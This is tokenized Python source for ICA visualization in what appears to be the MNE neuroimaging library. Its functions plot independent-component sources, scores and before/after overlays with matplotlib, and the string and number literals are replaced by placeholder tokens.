<EOL> src , subjects_dir = subjects_dir ) <EOL> run_tests_if_main ( ) <EOL> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from functools import partial <EOL> import numpy as np <EOL> from . utils import ( tight_layout , _prepare_trellis , _select_bads , <EOL> _layout_figure , _plot_raw_onscroll , _mouse_click , <EOL> _helper_raw_resize , _plot_raw_onkey , plt_show ) <EOL> from . raw import _prepare_mne_browse_raw , _plot_raw_traces <EOL> from . epochs import _prepare_mne_browse_epochs <EOL> from . evoked import _butterfly_on_button_press , _butterfly_onpick <EOL> from . topomap import _prepare_topo_plot , plot_topomap , _hide_frame <EOL> from . . utils import warn <EOL> from . . defaults import _handle_default <EOL> from . . io . meas_info import create_info <EOL> from . . io . pick import pick_types <EOL> from . . externals . six import string_types <EOL> def _ica_plot_sources_onpick_ ( event , sources = None , ylims = None ) : <EOL> """<STR_LIT>""" <EOL> if event . mouseevent . inaxes is None or event . mouseevent . button != <NUM_LIT:1> : <EOL> return <EOL> artist = event . artist <EOL> try : <EOL> import matplotlib . pyplot as plt <EOL> plt . figure ( ) <EOL> src_idx = artist . _mne_src_idx <EOL> component = artist . _mne_component <EOL> plt . plot ( sources [ src_idx ] , '<STR_LIT:r>' if artist . _mne_is_bad else '<STR_LIT:k>' ) <EOL> plt . ylim ( ylims ) <EOL> plt . grid ( linestyle = '<STR_LIT:->' , color = '<STR_LIT>' , linewidth = <NUM_LIT> ) <EOL> plt . title ( '<STR_LIT>' % component ) <EOL> except Exception as err : <EOL> print ( err ) <EOL> raise err <EOL> def plot_ica_sources ( ica , inst , picks = None , exclude = None , start = None , <EOL> stop = None , show = True , title = None , block = False ) : <EOL> """<STR_LIT>""" <EOL> from . . io . base import _BaseRaw <EOL> from . . evoked import Evoked <EOL> from . . epochs import _BaseEpochs <EOL> if exclude is None : <EOL> exclude = ica . exclude <EOL> elif len ( ica . exclude ) > <NUM_LIT:0> : <EOL> exclude = np . union1d ( ica . 
exclude , exclude ) <EOL> if isinstance ( inst , _BaseRaw ) : <EOL> fig = _plot_sources_raw ( ica , inst , picks , exclude , start = start , <EOL> stop = stop , show = show , title = title , <EOL> block = block ) <EOL> elif isinstance ( inst , _BaseEpochs ) : <EOL> fig = _plot_sources_epochs ( ica , inst , picks , exclude , start = start , <EOL> stop = stop , show = show , title = title , <EOL> block = block ) <EOL> elif isinstance ( inst , Evoked ) : <EOL> sources = ica . get_sources ( inst ) <EOL> if start is not None or stop is not None : <EOL> inst = inst . copy ( ) . crop ( start , stop ) <EOL> fig = _plot_ica_sources_evoked ( <EOL> evoked = sources , picks = picks , exclude = exclude , title = title , <EOL> labels = getattr ( ica , '<STR_LIT>' , None ) , show = show ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return fig <EOL> def _plot_ica_grid ( sources , start , stop , <EOL> source_idx , ncol , exclude , <EOL> title , show ) : <EOL> """<STR_LIT>""" <EOL> import matplotlib . pyplot as plt <EOL> if source_idx is None : <EOL> source_idx = np . arange ( len ( sources ) ) <EOL> elif isinstance ( source_idx , list ) : <EOL> source_idx = np . array ( source_idx ) <EOL> if exclude is None : <EOL> exclude = [ ] <EOL> n_components = len ( sources ) <EOL> ylims = sources . min ( ) , sources . max ( ) <EOL> xlims = np . arange ( sources . shape [ - <NUM_LIT:1> ] ) [ [ <NUM_LIT:0> , - <NUM_LIT:1> ] ] <EOL> fig , axes = _prepare_trellis ( n_components , ncol ) <EOL> if title is None : <EOL> fig . suptitle ( '<STR_LIT>' , size = <NUM_LIT:16> ) <EOL> elif title : <EOL> fig . suptitle ( title , size = <NUM_LIT:16> ) <EOL> plt . subplots_adjust ( wspace = <NUM_LIT> , hspace = <NUM_LIT> ) <EOL> my_iter = enumerate ( zip ( source_idx , axes , sources ) ) <EOL> for i_source , ( i_selection , ax , source ) in my_iter : <EOL> component = '<STR_LIT>' % i_selection <EOL> color = '<STR_LIT:r>' if i_selection in exclude else '<STR_LIT:k>' <EOL> line = ax . 
plot ( source , linewidth = <NUM_LIT:0.5> , color = color , picker = <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> vars ( line ) [ '<STR_LIT>' ] = i_source <EOL> vars ( line ) [ '<STR_LIT>' ] = i_selection <EOL> vars ( line ) [ '<STR_LIT>' ] = i_selection in exclude <EOL> ax . set_xlim ( xlims ) <EOL> ax . set_ylim ( ylims ) <EOL> ax . text ( <NUM_LIT> , <NUM_LIT> , component , transform = ax . transAxes , <EOL> verticalalignment = '<STR_LIT>' ) <EOL> plt . setp ( ax . get_xticklabels ( ) , visible = False ) <EOL> plt . setp ( ax . get_yticklabels ( ) , visible = False ) <EOL> callback = partial ( _ica_plot_sources_onpick_ , sources = sources , ylims = ylims ) <EOL> fig . canvas . mpl_connect ( '<STR_LIT>' , callback ) <EOL> plt_show ( show ) <EOL> return fig <EOL> def _plot_ica_sources_evoked ( evoked , picks , exclude , title , show , labels = None ) : <EOL> """<STR_LIT>""" <EOL> import matplotlib . pyplot as plt <EOL> if title is None : <EOL> title = '<STR_LIT>' <EOL> fig , axes = plt . subplots ( <NUM_LIT:1> ) <EOL> ax = axes <EOL> axes = [ axes ] <EOL> idxs = [ <NUM_LIT:0> ] <EOL> times = evoked . times * <NUM_LIT> <EOL> lines = list ( ) <EOL> texts = list ( ) <EOL> if picks is None : <EOL> picks = np . arange ( evoked . data . shape [ <NUM_LIT:0> ] ) <EOL> picks = np . sort ( picks ) <EOL> idxs = [ picks ] <EOL> color = '<STR_LIT:r>' <EOL> if labels is not None : <EOL> labels_used = [ k for k in labels if '<STR_LIT:/>' not in k ] <EOL> exclude_labels = list ( ) <EOL> for ii in picks : <EOL> if ii in exclude : <EOL> line_label = '<STR_LIT>' % ( ii + <NUM_LIT:1> ) <EOL> if labels is not None : <EOL> annot = list ( ) <EOL> for this_label in labels_used : <EOL> indices = labels [ this_label ] <EOL> if ii in indices : <EOL> annot . append ( this_label ) <EOL> line_label += ( '<STR_LIT>' + '<STR_LIT:U+002CU+0020>' . join ( annot ) ) <EOL> exclude_labels . append ( line_label ) <EOL> else : <EOL> exclude_labels . 
append ( None ) <EOL> if labels is not None : <EOL> unique_labels = set ( [ k . split ( '<STR_LIT>' ) [ <NUM_LIT:1> ] for k in exclude_labels if k ] ) <EOL> label_colors = plt . cm . rainbow ( np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , len ( unique_labels ) ) ) <EOL> label_colors = dict ( zip ( unique_labels , label_colors ) ) <EOL> else : <EOL> label_colors = dict ( ( k , '<STR_LIT>' ) for k in exclude_labels ) <EOL> for exc_label , ii in zip ( exclude_labels , picks ) : <EOL> if exc_label is not None : <EOL> if '<STR_LIT>' in exc_label : <EOL> key = exc_label . split ( '<STR_LIT>' ) [ <NUM_LIT:1> ] <EOL> else : <EOL> key = exc_label <EOL> color = label_colors [ key ] <EOL> lines . extend ( ax . plot ( times , evoked . data [ ii ] . T , picker = <NUM_LIT> , <EOL> zorder = <NUM_LIT:2> , color = color , label = exc_label ) ) <EOL> else : <EOL> lines . extend ( ax . plot ( times , evoked . data [ ii ] . T , picker = <NUM_LIT> , <EOL> color = '<STR_LIT:k>' , zorder = <NUM_LIT:1> ) ) <EOL> ax . set_title ( title ) <EOL> ax . set_xlim ( times [ [ <NUM_LIT:0> , - <NUM_LIT:1> ] ] ) <EOL> ax . set_xlabel ( '<STR_LIT>' ) <EOL> ax . set_ylabel ( '<STR_LIT>' ) <EOL> if len ( exclude ) > <NUM_LIT:0> : <EOL> plt . legend ( loc = '<STR_LIT>' ) <EOL> tight_layout ( fig = fig ) <EOL> texts . append ( ax . text ( <NUM_LIT:0> , <NUM_LIT:0> , '<STR_LIT:blank>' , zorder = <NUM_LIT:3> , <EOL> verticalalignment = '<STR_LIT>' , <EOL> horizontalalignment = '<STR_LIT:left>' , <EOL> fontweight = '<STR_LIT>' , alpha = <NUM_LIT:0> ) ) <EOL> lines = [ lines ] <EOL> ch_names = evoked . ch_names <EOL> from matplotlib import patheffects <EOL> path_effects = [ patheffects . withStroke ( linewidth = <NUM_LIT:2> , foreground = "<STR_LIT:w>" , <EOL> alpha = <NUM_LIT> ) ] <EOL> params = dict ( axes = axes , texts = texts , lines = lines , idxs = idxs , <EOL> ch_names = ch_names , need_draw = False , <EOL> path_effects = path_effects ) <EOL> fig . canvas . 
mpl_connect ( '<STR_LIT>' , <EOL> partial ( _butterfly_onpick , params = params ) ) <EOL> fig . canvas . mpl_connect ( '<STR_LIT>' , <EOL> partial ( _butterfly_on_button_press , <EOL> params = params ) ) <EOL> plt_show ( show ) <EOL> return fig <EOL> def plot_ica_scores ( ica , scores , <EOL> exclude = None , labels = None , <EOL> axhline = None , <EOL> title = '<STR_LIT>' , <EOL> figsize = ( <NUM_LIT:12> , <NUM_LIT:6> ) , show = True ) : <EOL> """<STR_LIT>""" <EOL> import matplotlib . pyplot as plt <EOL> my_range = np . arange ( ica . n_components_ ) <EOL> if exclude is None : <EOL> exclude = ica . exclude <EOL> exclude = np . unique ( exclude ) <EOL> if not isinstance ( scores [ <NUM_LIT:0> ] , ( list , np . ndarray ) ) : <EOL> scores = [ scores ] <EOL> n_rows = len ( scores ) <EOL> figsize = ( <NUM_LIT:12> , <NUM_LIT:6> ) if figsize is None else figsize <EOL> fig , axes = plt . subplots ( n_rows , figsize = figsize , sharex = True , sharey = True ) <EOL> if isinstance ( axes , np . ndarray ) : <EOL> axes = axes . flatten ( ) <EOL> else : <EOL> axes = [ axes ] <EOL> plt . suptitle ( title ) <EOL> if labels == '<STR_LIT>' : <EOL> labels = [ l for l in ica . labels_ if l . startswith ( '<STR_LIT>' ) ] <EOL> elif labels == '<STR_LIT>' : <EOL> labels = [ l for l in ica . labels_ if l . startswith ( '<STR_LIT>' ) ] <EOL> labels . sort ( key = lambda l : l . split ( '<STR_LIT:/>' ) [ <NUM_LIT:1> ] ) <EOL> elif isinstance ( labels , string_types ) : <EOL> if len ( axes ) > <NUM_LIT:1> : <EOL> raise ValueError ( '<STR_LIT>' % len ( axes ) ) <EOL> labels = [ labels ] <EOL> elif isinstance ( labels , ( tuple , list ) ) : <EOL> if len ( labels ) != len ( axes ) : <EOL> raise ValueError ( '<STR_LIT>' % len ( axes ) ) <EOL> elif labels is None : <EOL> labels = ( None , None ) <EOL> for label , this_scores , ax in zip ( labels , scores , axes ) : <EOL> if len ( my_range ) != len ( this_scores ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ax . 
bar ( my_range , this_scores , color = '<STR_LIT:w>' ) <EOL> for excl in exclude : <EOL> ax . bar ( my_range [ excl ] , this_scores [ excl ] , color = '<STR_LIT:r>' ) <EOL> if axhline is not None : <EOL> if np . isscalar ( axhline ) : <EOL> axhline = [ axhline ] <EOL> for axl in axhline : <EOL> ax . axhline ( axl , color = '<STR_LIT:r>' , linestyle = '<STR_LIT>' ) <EOL> ax . set_ylabel ( '<STR_LIT>' ) <EOL> if label is not None : <EOL> if '<STR_LIT>' in label : <EOL> split = label . split ( '<STR_LIT:/>' ) <EOL> label = '<STR_LIT:U+002CU+0020>' . join ( [ split [ <NUM_LIT:0> ] , split [ <NUM_LIT:2> ] ] ) <EOL> elif '<STR_LIT:/>' in label : <EOL> label = '<STR_LIT:U+002CU+0020>' . join ( label . split ( '<STR_LIT:/>' ) ) <EOL> ax . set_title ( '<STR_LIT>' % label ) <EOL> ax . set_xlabel ( '<STR_LIT>' ) <EOL> ax . set_xlim ( <NUM_LIT:0> , len ( this_scores ) ) <EOL> tight_layout ( fig = fig ) <EOL> if len ( axes ) > <NUM_LIT:1> : <EOL> plt . subplots_adjust ( top = <NUM_LIT> ) <EOL> plt_show ( show ) <EOL> return fig <EOL> def plot_ica_overlay ( ica , inst , exclude = None , picks = None , start = None , <EOL> stop = None , title = None , show = True ) : <EOL> """<STR_LIT>""" <EOL> from . . io . base import _BaseRaw <EOL> from . . evoked import Evoked <EOL> from . . preprocessing . ica import _check_start_stop <EOL> if not isinstance ( inst , ( _BaseRaw , Evoked ) ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if title is None : <EOL> title = '<STR_LIT>' <EOL> if picks is None : <EOL> picks = [ inst . ch_names . index ( k ) for k in ica . ch_names ] <EOL> if exclude is None : <EOL> exclude = ica . 
exclude <EOL> if isinstance ( inst , _BaseRaw ) : <EOL> if start is None : <EOL> start = <NUM_LIT:0.0> <EOL> if stop is None : <EOL> stop = <NUM_LIT> <EOL> ch_types_used = [ k for k in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] if k in ica ] <EOL> start_compare , stop_compare = _check_start_stop ( inst , start , stop ) <EOL> data , times = inst [ picks , start_compare : stop_compare ] <EOL> raw_cln = ica . apply ( inst . copy ( ) , exclude = exclude , <EOL> start = start , stop = stop ) <EOL> data_cln , _ = raw_cln [ picks , start_compare : stop_compare ] <EOL> fig = _plot_ica_overlay_raw ( data = data , data_cln = data_cln , <EOL> times = times * <NUM_LIT> , title = title , <EOL> ch_types_used = ch_types_used , show = show ) <EOL> elif isinstance ( inst , Evoked ) : <EOL> if start is not None and stop is not None : <EOL> inst = inst . copy ( ) . crop ( start , stop ) <EOL> if picks is not None : <EOL> inst . pick_channels ( [ inst . ch_names [ p ] for p in picks ] ) <EOL> evoked_cln = ica . apply ( inst . copy ( ) , exclude = exclude ) <EOL> fig = _plot_ica_overlay_evoked ( evoked = inst , evoked_cln = evoked_cln , <EOL> title = title , show = show ) <EOL> return fig <EOL> def _plot_ica_overlay_raw ( data , data_cln , times , title , ch_types_used , show ) : <EOL> """<STR_LIT>""" <EOL> import matplotlib . pyplot as plt <EOL> assert data . shape == data_cln . shape <EOL> fig , ( ax1 , ax2 ) = plt . subplots ( <NUM_LIT:2> , <NUM_LIT:1> , sharex = True ) <EOL> plt . suptitle ( title ) <EOL> ax1 . plot ( times , data . T , color = '<STR_LIT:r>' ) <EOL> ax1 . plot ( times , data_cln . T , color = '<STR_LIT:k>' ) <EOL> ax1 . set_xlabel ( '<STR_LIT>' ) <EOL> ax1 . set_xlim ( times [ <NUM_LIT:0> ] , times [ - <NUM_LIT:1> ] ) <EOL> ax1 . set_xlim ( times [ <NUM_LIT:0> ] , times [ - <NUM_LIT:1> ] ) <EOL> ax1 . 
set_title ( '<STR_LIT>' ) <EOL> _ch_types = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> ch_types = '<STR_LIT:U+002CU+0020>' . join ( [ _ch_types [ k ] for k in ch_types_used ] ) <EOL> ax2 . set_title ( '<STR_LIT>' . format ( ch_types ) ) <EOL> ax2 . plot ( times , data . mean ( <NUM_LIT:0> ) , color = '<STR_LIT:r>' ) <EOL> ax2 . plot ( times , data_cln . mean ( <NUM_LIT:0> ) , color = '<STR_LIT:k>' ) <EOL> ax2 . set_xlim ( <NUM_LIT:100> , <NUM_LIT> ) <EOL> ax2 . set_xlabel ( '<STR_LIT>' ) <EOL> ax2 . set_xlim ( times [ <NUM_LIT:0> ] , times [ - <NUM_LIT:1> ] ) <EOL> tight_layout ( fig = fig ) <EOL> fig . subplots_adjust ( top = <NUM_LIT> ) <EOL> fig . canvas . draw ( ) <EOL> plt_show ( show ) <EOL> return fig <EOL> def _plot_ica_overlay_evoked ( evoked , evoked_cln , title , show ) : <EOL> """<STR_LIT>""" <EOL> import matplotlib . pyplot as plt <EOL> ch_types_used = [ c for c in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] if c in evoked ] <EOL> n_rows = len ( ch_types_used ) <EOL> ch_types_used_cln = [ c for c in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] if <EOL> c in evoked_cln ] <EOL> if len ( ch_types_used ) != len ( ch_types_used_cln ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> fig , axes = plt . subplots ( n_rows , <NUM_LIT:1> ) <EOL> fig . suptitle ( '<STR_LIT>' ) <EOL> axes = axes . flatten ( ) if isinstance ( axes , np . ndarray ) else axes <EOL> evoked . plot ( axes = axes , show = show ) <EOL> for ax in fig . axes : <EOL> for l in ax . get_lines ( ) : <EOL> l . set_color ( '<STR_LIT:r>' ) <EOL> fig . canvas . draw ( ) <EOL> evoked_cln . plot ( axes = axes , show = show ) <EOL> tight_layout ( fig = fig ) <EOL> fig . subplots_adjust ( top = <NUM_LIT> ) <EOL> fig . canvas . 
draw ( ) <EOL> plt_show ( show ) <EOL> return fig <EOL> def _plot_sources_raw ( ica , raw , picks , exclude , start , stop , show , title , <EOL> block ) : <EOL> """<STR_LIT>""" <EOL> color = _handle_default ( '<STR_LIT>' , ( <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ) ) <EOL> orig_data = ica . _transform_raw ( raw , <NUM_LIT:0> , len ( raw . times ) ) * <NUM_LIT> <EOL> if picks is None : <EOL> picks = range ( len ( orig_data ) ) <EOL> types = [ '<STR_LIT>' for _ in picks ] <EOL> picks = list ( sorted ( picks ) ) <EOL> eog_chs = pick_types ( raw . info , meg = False , eog = True , ref_meg = False ) <EOL> ecg_chs = pick_types ( raw . info , meg = False , ecg = True , ref_meg = False ) <EOL> data = [ orig_data [ pick ] for pick in picks ] <EOL> c_names = [ '<STR_LIT>' % x for x in range ( len ( orig_data ) ) ] <EOL> for eog_idx in eog_chs : <EOL> c_names . append ( raw . ch_names [ eog_idx ] ) <EOL> types . append ( '<STR_LIT>' ) <EOL> for ecg_idx in ecg_chs : <EOL> c_names . append ( raw . ch_names [ ecg_idx ] ) <EOL> types . append ( '<STR_LIT>' ) <EOL> extra_picks = np . append ( eog_chs , ecg_chs ) . astype ( int ) <EOL> if len ( extra_picks ) > <NUM_LIT:0> : <EOL> eog_ecg_data , _ = raw [ extra_picks , : ] <EOL> for idx in range ( len ( eog_ecg_data ) ) : <EOL> if idx < len ( eog_chs ) : <EOL> eog_ecg_data [ idx ] /= <NUM_LIT> <EOL> else : <EOL> eog_ecg_data [ idx ] /= <NUM_LIT> <EOL> data = np . append ( data , eog_ecg_data , axis = <NUM_LIT:0> ) <EOL> for idx in range ( len ( extra_picks ) ) : <EOL> picks = np . append ( picks , ica . n_components_ + idx ) <EOL> if title is None : <EOL> title = '<STR_LIT>' <EOL> info = create_info ( [ c_names [ x ] for x in picks ] , raw . info [ '<STR_LIT>' ] ) <EOL> info [ '<STR_LIT>' ] = [ c_names [ x ] for x in exclude ] <EOL> if start is None : <EOL> start = <NUM_LIT:0> <EOL> if stop is None : <EOL> stop = start + <NUM_LIT:20> <EOL> stop = min ( stop , raw . 
times [ - <NUM_LIT:1> ] ) <EOL> duration = stop - start <EOL> if duration <= <NUM_LIT:0> : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> t_end = int ( duration * raw . info [ '<STR_LIT>' ] ) <EOL> times = raw . times [ <NUM_LIT:0> : t_end ] <EOL> bad_color = ( <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> ) <EOL> inds = list ( range ( len ( picks ) ) ) <EOL> data = np . array ( data ) <EOL> n_channels = min ( [ <NUM_LIT:20> , len ( picks ) ] ) <EOL> params = dict ( raw = raw , orig_data = data , data = data [ : , <NUM_LIT:0> : t_end ] , <EOL> ch_start = <NUM_LIT:0> , t_start = start , info = info , duration = duration , <EOL> ica = ica , n_channels = n_channels , times = times , types = types , <EOL> n_times = raw . n_times , bad_color = bad_color , picks = picks ) <EOL> _prepare_mne_browse_raw ( params , title , '<STR_LIT:w>' , color , bad_color , inds , <EOL> n_channels ) <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:1.0> <EOL> params [ '<STR_LIT>' ] = partial ( _plot_raw_traces , params = params , inds = inds , <EOL> color = color , bad_color = bad_color ) <EOL> params [ '<STR_LIT>' ] = partial ( _update_data , params ) <EOL> params [ '<STR_LIT>' ] = partial ( _pick_bads , params = params ) <EOL> params [ '<STR_LIT>' ] = partial ( _label_clicked , params = params ) <EOL> _layout_figure ( params ) <EOL> callback_key = partial ( _plot_raw_onkey , params = params ) <EOL> params [ '<STR_LIT>' ] . canvas . mpl_connect ( '<STR_LIT>' , callback_key ) <EOL> callback_scroll = partial ( _plot_raw_onscroll , params = params ) <EOL> params [ '<STR_LIT>' ] . canvas . mpl_connect ( '<STR_LIT>' , callback_scroll ) <EOL> callback_pick = partial ( _mouse_click , params = params ) <EOL> params [ '<STR_LIT>' ] . canvas . mpl_connect ( '<STR_LIT>' , callback_pick ) <EOL> callback_resize = partial ( _helper_raw_resize , params = params ) <EOL> params [ '<STR_LIT>' ] . canvas . 
mpl_connect ( '<STR_LIT>' , callback_resize ) <EOL> callback_close = partial ( _close_event , params = params ) <EOL> params [ '<STR_LIT>' ] . canvas . mpl_connect ( '<STR_LIT>' , callback_close ) <EOL> params [ '<STR_LIT>' ] = None <EOL> params [ '<STR_LIT>' ] = None <EOL> params [ '<STR_LIT>' ] ( ) <EOL> params [ '<STR_LIT>' ] ( ) <EOL> try : <EOL> plt_show ( show , block = block ) <EOL> except TypeError : <EOL> plt_show ( show ) <EOL> return params [ '<STR_LIT>' ] <EOL> def _update_data ( params ) : <EOL> """<STR_LIT>""" <EOL> sfreq = params [ '<STR_LIT:info>' ] [ '<STR_LIT>' ] <EOL> start = int ( params [ '<STR_LIT>' ] * sfreq ) <EOL> end = int ( ( params [ '<STR_LIT>' ] + params [ '<STR_LIT>' ] ) * sfreq ) <EOL> params [ '<STR_LIT:data>' ] = params [ '<STR_LIT>' ] [ : , start : end ] <EOL> params [ '<STR_LIT>' ] = params [ '<STR_LIT>' ] . times [ start : end ] <EOL> def _pick_bads ( event , params ) : <EOL> """<STR_LIT>""" <EOL> bads = params [ '<STR_LIT:info>' ] [ '<STR_LIT>' ] <EOL> params [ '<STR_LIT:info>' ] [ '<STR_LIT>' ] = _select_bads ( event , params , bads ) <EOL> params [ '<STR_LIT>' ] ( ) <EOL> params [ '<STR_LIT>' ] ( ) <EOL> def _close_event ( events , params ) : <EOL> """<STR_LIT>""" <EOL> info = params [ '<STR_LIT:info>' ] <EOL> c_names = [ '<STR_LIT>' % x for x in range ( params [ '<STR_LIT>' ] . n_components_ ) ] <EOL> exclude = [ c_names . index ( x ) for x in info [ '<STR_LIT>' ] if x . startswith ( '<STR_LIT>' ) ] <EOL> params [ '<STR_LIT>' ] . exclude = exclude <EOL> def _plot_sources_epochs ( ica , epochs , picks , exclude , start , stop , show , <EOL> title , block ) : <EOL> """<STR_LIT>""" <EOL> data = ica . _transform_epochs ( epochs , concatenate = True ) <EOL> eog_chs = pick_types ( epochs . info , meg = False , eog = True , ref_meg = False ) <EOL> ecg_chs = pick_types ( epochs . info , meg = False , ecg = True , ref_meg = False ) <EOL> c_names = [ '<STR_LIT>' % x for x in range ( ica . n_components_ ) ] <EOL> ch_types = np . 
repeat ( '<STR_LIT>' , ica . n_components_ ) <EOL> for eog_idx in eog_chs : <EOL> c_names . append ( epochs . ch_names [ eog_idx ] ) <EOL> ch_types = np . append ( ch_types , '<STR_LIT>' ) <EOL> for ecg_idx in ecg_chs : <EOL> c_names . append ( epochs . ch_names [ ecg_idx ] ) <EOL> ch_types = np . append ( ch_types , '<STR_LIT>' ) <EOL> extra_picks = np . append ( eog_chs , ecg_chs ) . astype ( int ) <EOL> if len ( extra_picks ) > <NUM_LIT:0> : <EOL> eog_ecg_data = np . concatenate ( epochs . get_data ( ) [ : , extra_picks ] , <EOL> axis = <NUM_LIT:1> ) <EOL> data = np . append ( data , eog_ecg_data , axis = <NUM_LIT:0> ) <EOL> scalings = _handle_default ( '<STR_LIT>' ) <EOL> scalings [ '<STR_LIT>' ] = <NUM_LIT> <EOL> info = create_info ( ch_names = c_names , sfreq = epochs . info [ '<STR_LIT>' ] , <EOL> ch_types = ch_types ) <EOL> info [ '<STR_LIT>' ] = list ( ) <EOL> info [ '<STR_LIT>' ] = [ c_names [ x ] for x in exclude ] <EOL> if title is None : <EOL> title = '<STR_LIT>' <EOL> if picks is None : <EOL> picks = list ( range ( ica . n_components_ ) ) <EOL> if start is None : <EOL> start = <NUM_LIT:0> <EOL> if stop is None : <EOL> stop = start + <NUM_LIT:20> <EOL> stop = min ( stop , len ( epochs . events ) ) <EOL> for idx in range ( len ( extra_picks ) ) : <EOL> picks = np . append ( picks , ica . n_components_ + idx ) <EOL> n_epochs = stop - start <EOL> if n_epochs <= <NUM_LIT:0> : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> params = { '<STR_LIT>' : ica , <EOL> '<STR_LIT>' : epochs , <EOL> '<STR_LIT:info>' : info , <EOL> '<STR_LIT>' : data , <EOL> '<STR_LIT>' : list ( ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> ) , <EOL> '<STR_LIT>' : start * len ( epochs . 
times ) } <EOL> params [ '<STR_LIT>' ] = partial ( _label_clicked , params = params ) <EOL> _prepare_mne_browse_epochs ( params , projs = list ( ) , n_channels = <NUM_LIT:20> , <EOL> n_epochs = n_epochs , scalings = scalings , <EOL> title = title , picks = picks , <EOL> order = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> params [ '<STR_LIT>' ] = _update_epoch_data <EOL> _update_epoch_data ( params ) <EOL> params [ '<STR_LIT>' ] . set_x ( params [ '<STR_LIT>' ] ) <EOL> callback_close = partial ( _close_epochs_event , params = params ) <EOL> params [ '<STR_LIT>' ] . canvas . mpl_connect ( '<STR_LIT>' , callback_close ) <EOL> try : <EOL> plt_show ( show , block = block ) <EOL> except TypeError : <EOL> plt_show ( show ) <EOL> return params [ '<STR_LIT>' ] <EOL> def _update_epoch_data ( params ) : <EOL> """<STR_LIT>""" <EOL> start = params [ '<STR_LIT>' ] <EOL> n_epochs = params [ '<STR_LIT>' ] <EOL> end = start + n_epochs * len ( params [ '<STR_LIT>' ] . times ) <EOL> data = params [ '<STR_LIT>' ] [ : , start : end ] <EOL> types = params [ '<STR_LIT>' ] <EOL> for pick , ind in enumerate ( params [ '<STR_LIT>' ] ) : <EOL> params [ '<STR_LIT:data>' ] [ pick ] = data [ ind ] / params [ '<STR_LIT>' ] [ types [ pick ] ] <EOL> params [ '<STR_LIT>' ] ( ) <EOL> def _close_epochs_event ( events , params ) : <EOL> """<STR_LIT>""" <EOL> info = params [ '<STR_LIT:info>' ] <EOL> exclude = [ info [ '<STR_LIT>' ] . index ( x ) for x in info [ '<STR_LIT>' ] <EOL> if x . startswith ( '<STR_LIT>' ) ] <EOL> params [ '<STR_LIT>' ] . exclude = exclude <EOL> def _label_clicked ( pos , params ) : <EOL> """<STR_LIT>""" <EOL> import matplotlib . pyplot as plt <EOL> offsets = np . array ( params [ '<STR_LIT>' ] ) + params [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> line_idx = np . 
searchsorted ( offsets , pos [ <NUM_LIT:1> ] ) + params [ '<STR_LIT>' ] <EOL> if line_idx >= len ( params [ '<STR_LIT>' ] ) : <EOL> return <EOL> ic_idx = [ params [ '<STR_LIT>' ] [ line_idx ] ] <EOL> types = list ( ) <EOL> info = params [ '<STR_LIT>' ] . info <EOL> if len ( pick_types ( info , meg = False , eeg = True , ref_meg = False ) ) > <NUM_LIT:0> : <EOL> types . append ( '<STR_LIT>' ) <EOL> if len ( pick_types ( info , meg = '<STR_LIT>' , ref_meg = False ) ) > <NUM_LIT:0> : <EOL> types . append ( '<STR_LIT>' ) <EOL> if len ( pick_types ( info , meg = '<STR_LIT>' , ref_meg = False ) ) > <NUM_LIT:0> : <EOL> types . append ( '<STR_LIT>' ) <EOL> ica = params [ '<STR_LIT>' ] <EOL> data = np . dot ( ica . mixing_matrix_ [ : , ic_idx ] . T , <EOL> ica . pca_components_ [ : ica . n_components_ ] ) <EOL> data = np . atleast_2d ( data ) <EOL> fig , axes = _prepare_trellis ( len ( types ) , max_col = <NUM_LIT:3> ) <EOL> for ch_idx , ch_type in enumerate ( types ) : <EOL> try : <EOL> data_picks , pos , merge_grads , _ , _ = _prepare_topo_plot ( ica , <EOL> ch_type , <EOL> None ) <EOL> except Exception as exc : <EOL> warn ( exc ) <EOL> plt . close ( fig ) <EOL> return <EOL> this_data = data [ : , data_picks ] <EOL> ax = axes [ ch_idx ] <EOL> if merge_grads : <EOL> from . . channels . layout import _merge_grad_data <EOL> for ii , data_ in zip ( ic_idx , this_data ) : <EOL> ax . set_title ( '<STR_LIT>' % ii + ch_type , fontsize = <NUM_LIT:12> ) <EOL> data_ = _merge_grad_data ( data_ ) if merge_grads else data_ <EOL> plot_topomap ( data_ . flatten ( ) , pos , axes = ax , show = False ) <EOL> _hide_frame ( ax ) <EOL> tight_layout ( fig = fig ) <EOL> fig . subplots_adjust ( top = <NUM_LIT> ) <EOL> fig . canvas . draw ( ) <EOL> plt_show ( True ) </s>
